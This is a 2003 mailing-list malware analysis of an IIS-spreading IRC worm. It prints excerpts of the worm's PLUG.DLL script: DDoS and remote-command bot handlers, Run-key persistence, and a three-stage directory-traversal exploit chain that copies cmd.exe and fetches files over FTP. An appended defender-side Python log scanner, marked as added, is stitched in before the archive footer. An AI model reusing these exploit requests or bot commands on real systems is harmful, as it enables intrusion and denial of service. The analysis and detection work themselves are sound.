On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002at_private> wrote:
>
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> attack3.dump=1.6kb

It's either this:

    http://www.gdgsoft.com/info/notes/gsfxalert.asp

or a very close relative. This beastie swept through my networks and has
caused quite a few machines to become infected. The variant that I've got
creates:

    C:\WINNT\SYSTEM32\dfg ghj\loi gty\

which contains this:

    CLS.BAT
    DATA.BAK
    DEXE.CPL
    FSLX.EXE
    KLSYS.EXE
    NEXE.CPL
    PLUG.DLL
    PSC32.EXE
    SYSTL.EXE
    TSYSL.BAT
    WINSE.EXE

It appears to be a more recent version of W32.Randon.worm:

    http://vil.nai.com/vil/content/v_100097.htm

with quite a few "improvements" like a much larger dictionary, and it
doesn't seem to be detected by several of the larger anti-virus packages
(I might add that clamd *does* find this one as W32.Mix). Oh, and it's got
DDoS capabilities.

Here's the top bit of `strings PLUG.DLL`:

    on *:START:{
    run systl.exe /n /fh
    winsck
    sconf
    inc %many
    if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR }
    alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 }
    on *:TEXT:*:*: {
    if ($nick isop $rds(sc)) {
    if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } }
    if ($1 = !ntreg) { reg $2- }
    if ($1 = !ntstop) { ntstop }
    if ($1 = !dde) { /dde $2 command "" / $+ $3- }
    if ($1 = !ind) { .identd on $2- }
    if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- }
    if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 }
    if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy!
    | /fserve $nick 3 $2 }
    if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym 14DDoS 14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic }
    if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym 14DDoS 14 packeting halted! }
    if ($1 = !run) && ($2 != $null) { /run $2- }
    if ($1 = !icmp) { if ($2 == $null) { /saym rror yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " }
    if ($1 = !Clone) { /clone $2- }
    if ($1 = !syn) { if ($2 !== $null) { saym

. . . and so it goes for 692 lines.

The odd HTTP connects that you saw were from the very end of PLUG.DLL:

    alias sconf {
    .ddeserver on gtt1wst3r1.4.2
    .nick [_ $+ $r(1000,99999) $+ ]]
    .n0clone
    .Cona
    .timercheck 0 10 Cona
    .timerh1dd3 -o 0 1 H1dd3
    .timers33 -o 0 1 s33
    .timerregs -o 0 1 regs
    .run systl.exe /n /fh /r cls.BAT
    .timerkillsofts -o 0 5 killsofts
    alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\salfx,$mircdirklsys.exe,REG_SZ) } }
    alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } }
    alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } }
    on *:SOCKOPEN:Sg1.*: {
    sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
    on *:SOCKCLOSE:Sg1.*: {
    sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
    on *:SOCKOPEN:Sg2.*: {
    saym IIS Exploit ATTEMPTING STAGE 2
    sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+ >>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
    on *:SOCKCLOSE:Sg2.*: {
    saym IIS Exploit STAGE 2 COMPLETE
    sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
    on *:SOCKOPEN:Sg3.*: {
    saym IIS Exploit ATTEMPTING STAGE 3
    sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
    on *:SOCKCLOSE:Sg3.*: {
    saym IIS Exploit STAGE 3 COMPLETE

An infected host will join an IRC channel on rul3z.q8hell.org and sit
waiting for instructions. The host will also start scanning for Windows
shares that it can infect. It appears to also use a fairly large
dictionary in an attempt to guess passwords on any shares that it finds.
And finally, the infected host will start scanning for IIS web servers to
infect.

Paul
--
Paul Dokas dokasat_private
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."

----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training
sessions, 1,800 delegates from 30 nations including all of the top experts,
from CSO's to "underground" security specialists. See for yourself what the
buzz is about! Early-bird registration ends July 3. This event will sell
out. www.blackhat.com
----------------------------------------------------------------------------
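As an added, defender-side example that is not part of Paul's post or of the worm's own code: a small Python scanner that reads IIS W3C extended log lines and tags the three request stages shown in PLUG.DLL (the double-encoded `..%255c` traversal to cmd.exe, the `script.exe` FTP-script drop, and the `httpodbc.dll?MfcISAPICommand=Exploit` call), plus the bogus `Host: www.google.com` header that started the thread. The log lines, the `#Fields:` layout (including a `cs(Host)` column) and the `EXPECTED_HOSTS` value are constructed assumptions for illustration.

```python
"""Flag the worm's three-stage IIS exploit chain in W3C extended logs.

Assumptions (not from the original post): logs carry a #Fields: header with
cs-uri-stem, cs-uri-query and cs(Host); the sample below is constructed.
"""
from urllib.parse import unquote

# Assumption: the hostnames this web server legitimately answers for.
EXPECTED_HOSTS = {"www.example.com"}

# Constructed sample log in IIS W3C extended format (not a real capture).
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Host)
2003-07-14 17:30:01 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe 200 www.google.com
2003-07-14 17:30:02 10.0.0.5 GET /scripts/script.exe /c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd 200 www.google.com
2003-07-14 17:30:03 10.0.0.5 GET /scripts/httpodbc.dll MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe 200 www.google.com
2003-07-14 17:31:00 10.0.0.9 GET /default.htm - 200 www.example.com
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed record; a real tool would report it
        yield dict(zip(fields, values))


def decode_twice(s):
    """IIS decoded the path a second time after the security check, which is
    exactly what ..%255c relied on; mirror that so the traversal is visible."""
    return unquote(unquote(s))


def classify(rec):
    """Return the list of indicator tags that match one log record."""
    stem = decode_twice(rec.get("cs-uri-stem", "")).replace("\\", "/").lower()
    query = decode_twice(rec.get("cs-uri-query", "")).replace("\\", "/").lower()
    spaced = query.replace("+", " ")
    host = rec.get("cs(Host)", "").lower()
    tags = []
    if "/../" in stem and stem.endswith("cmd.exe"):
        tags.append("stage1_traversal_cmd")
    if stem.endswith("/scripts/script.exe") and ("echo open" in spaced or "ftp -s" in spaced):
        tags.append("stage2_ftp_script_drop")
    if stem.endswith("httpodbc.dll") and "mfcisapicommand=exploit" in query:
        tags.append("stage3_httpodbc")
    # The worm sends Host: www.google.com to every target; any Host value that
    # is not one of this server's own names is worth a look on its own.
    if host and host not in EXPECTED_HOSTS:
        tags.append("host_header_mismatch")
    return tags


def scan(text):
    """Return [(c-ip, cs-uri-stem, tags)] for records matching any indicator."""
    hits = []
    for rec in parse_w3c(text):
        tags = classify(rec)
        if tags:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], tags))
    return hits


def chain_complete(hits):
    """Client IPs that show all three stages, i.e. the worm's full sequence."""
    stages = {}
    for ip, _stem, tags in hits:
        stages.setdefault(ip, set()).update(t for t in tags if t.startswith("stage"))
    return {ip for ip, seen in stages.items() if len(seen) == 3}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, stem, tags in found:
        print(ip, stem, ",".join(tags))
    print("full chain from:", sorted(chain_complete(found)))
```

Stage 1 alone is the old Unicode/double-decode traversal that many scanners already trip on; the value of correlating per client IP is that a host showing all three stages in sequence has very likely had `script.exe` and the dropped files written under `c:\inetpub\scripts`, so that box goes to the top of the cleanup list rather than into the generic "blocked scanner" pile.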
This archive was generated by hypermail 2b30 : Tue Jul 15 2003 - 11:21:52 PDT